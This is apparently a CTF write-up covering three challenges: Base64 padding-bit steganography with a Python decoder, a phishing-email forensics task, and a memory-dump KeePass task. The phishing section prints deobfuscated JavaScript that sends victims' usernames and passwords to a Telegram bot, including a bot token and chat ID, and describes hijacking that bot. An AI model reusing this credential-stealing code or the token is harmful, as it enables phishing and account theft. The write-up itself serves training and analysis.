Enset challenge Quals 2025 Writeups
Enset challenge CTF 2025
In this post, I'll walk through the solutions for some challenges from Enset challenge CTF 2025, 2 DFIR challs and one crypto for now :
Challenge 1: Base64 Bityy Bits!
Description
The challenge provided us with a file steg64.txt, just a normal file !
Solution
Base64 encodes data using 6-bit chunks. Sometimes, the last few bits in a chunk aren't used and are just set to zero. This challenge hides secret bits in those unused parts. Standard Base64 decoders ignore them, but we can extract them manually by reading the raw 6-bit values. (i had to use cyberchef to notice the process at first)
V0F=
Qz==
SI==
IN==
S9==
QQ==
Tt==
Qi==
QR==
Tg==
TF==
ST==
Sx==
ID==
Nx==
Te==
Qd==
Uo==
IF==
Uh==
Qd==
S7==
IB==
TK==
Qd==
M3==
Qt==
IG==
TZ==
Mx==
Qd==
IF==
TJ==
S9==
Ql==
QW==
Ug==
Ic==
Cp==
U0==
SZ==
Uq==
IB==
OZ==
Uh==
QR==
IN==
RB==
T5==
Up==
T5==
U2==
S5==
IL==
TV==
Qe==
VB==
Ta==
Qx==
SG==
SZ==
Q9==
SM==
IP==
Qk==
M/==
SV==
RP==
IF==
and thus my script :
import base64
BASE64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
def b64_to_6bits(s):
return ''.join(f'{BASE64_ALPHABET.index(c):06b}' for c in s if c in BASE64_ALPHABET)
def extract_bytes(bitstring):
return bytes(int(bitstring[i:i+8], 2) for i in range(0, len(bitstring)-7, 8))
cover_bits = ''
hidden_bits = ''
with open('steg64.txt') as f:
for line in f:
bits = b64_to_6bits(line.strip())
byte_len = len(bits) // 8 * 8
cover_bits += bits[:byte_len]
hidden_bits += bits[byte_len:]
print("Cover Message:", extract_bytes(cover_bits))
print("Hidden Message:", extract_bytes(hidden_bits))
Flag
N7CHALL{aGlk_ZGVuX2RhdGFfZmxhZw==}
Challenge 2: Abdo tchigger - DFIR
We were given a .eml file, a classic phishing email containing a link to a suspicious site: https://insagram-psi.vercel.app , Inspecting the site, The deobfuscated script revealed data exfiltration via a Telegram bot. It included the bot token and a chat ID, likely where stolen data was sent.
function postData() {
const _0x3539c7 = document.getElementById("username").value;
const _0x5cae27 = document.getElementById("password").value;
fetch("https://api.telegram.org/bot7809830507:AAHgALe4iP7-MRFb7vPfXAbNp5WqScZ4_v0/sendMessage", {
'method': "POST",
'headers': {
'Content-Type': "application/json"
},
'body': JSON.stringify({
'chat_id': "7881225317",
'text': "Username: " + _0x3539c7 + "\nPassword: " + _0x5cae27
})
}).then(_0x3077d5 => _0x3077d5.json()).then(_0x56ac0e => {
console.log("Success:", _0x56ac0e);
})["catch"](_0x44b17c => {
console.error("Error:", _0x44b17c);
});
}
After verifying the bot's permissions (able to send messages to private chats), I joined the bot and started a chat, then I retreived my chat Id using userbotinfo, and used Telegram's API and a script to brute-force message IDs
and forward them to my Telegram account until I found the flag.
Flag
N7CHALL{Abd0_Tch1gg3r_Ph1sh3d_L1k3_A_B0SS}
Challenge 3: Trust Issues - DFIR
We got a dump.vmem file. Checking the running processes at the time of the memory capture, we noticed notepad.exe was used to open and write to a file named keepassword.txt. Dumping the content revealed a password: enset@2025.
That instantly hinted we might be dealing with a KeePass database. Digging deeper, and after dumping the user's command history, we started to piece together exactly what happened.
cd .\Desktop\
notepad.exe keepass-pass.txt
ls
7z
cd ..
cleaer
clear
cd .\Desktop\
ls
notepad.exe keepass-passwd.txt
7z a -tzip -p"n01v4trustn01" -mem=AES256 secured_flag.zip .\flag.kdbx
ls
.\winpmem_mini_x64_rc2.exe memory.raw
clear
ls
cd .\Desktop\
ls
clear
7z a -tzip -p"n01v4trustn01" -mem=AES256 flag.zip .\flag.kdbx
rm .\flag.kdbx
nano .\keepasswd.txt
notepad.exe .\keepasswd.txt
$zipFile = Get-Content C:\Users\Public\secured_flag.zip -Raw`
Start-Sleep -Seconds 60 # Keep it in memory before dumping
cd .\Desktop\
$zipFile = Get-Content C:\Users\Public\secured_flag.zip -Raw`
Start-Sleep -Seconds 60
$zipFile = Get-Content flag.zip -Raw`
Start-Sleep -Seconds 60
next it's easy now.
Flag
N7CHALL{Tru5t_N0_0ne_4lways_Expl0it}
[more writeups after the exams...]